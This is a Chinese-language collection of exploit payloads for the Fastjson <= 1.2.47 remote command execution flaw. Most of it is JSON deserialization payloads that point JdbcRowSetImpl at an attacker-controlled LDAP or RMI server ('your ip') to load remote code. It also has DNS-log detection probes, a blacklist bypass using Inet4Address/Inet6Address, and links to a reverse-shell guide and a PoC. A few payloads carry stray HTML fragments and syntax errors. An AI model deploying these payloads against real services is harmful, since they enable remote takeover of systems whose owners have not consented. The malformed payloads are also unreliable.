Fastjson <= 1.2.47 遠程命令執行漏洞利用工具及方法記錄
payload
rmi://、ldap:// 可以切換嘗試。
param={
"@type": "java.lang.Class",
br / > "a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
"@type": "com.sun.rowset.JdbcRowSetImpl",
br / >
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://your ip/",
"autoCommit": true
}
}
param={
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://your ip/",
"autoCommit":true
}
}
param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}
param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}}
# JNDI 注入
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}
param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/,"autoCommit":true}
# DNS log
param={"@type":"java.net.InetAddress","val":"example.com"}
可以通過 dns log 的方式得知漏洞是否存在了
利用java.net.Inet[4|6]Address
很早之前有一個方法是使用java.net.InetAddress類,現在這個類已經列入黑名單。然而在翻閱fastjson最新版源碼(v1.2.67)時,發現兩個類沒有在黑名單中,於是可以構造了如下payload,即可使fastjson進行DNS解析。下面以java.net.Inet4Address為例分析構造原理。
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
參考
反彈shell
https://blog.csdn.net/Jiajiajiang_/article/details/103255659
復現pyload
https://blog.51cto.com/13770310/2425330?source=dra
靶場
https://vulhub.org/#/environments/fastjson/1.2.24-rce/
教程
https://github.com/shengqi158/fastjson-remote-code-execute-poc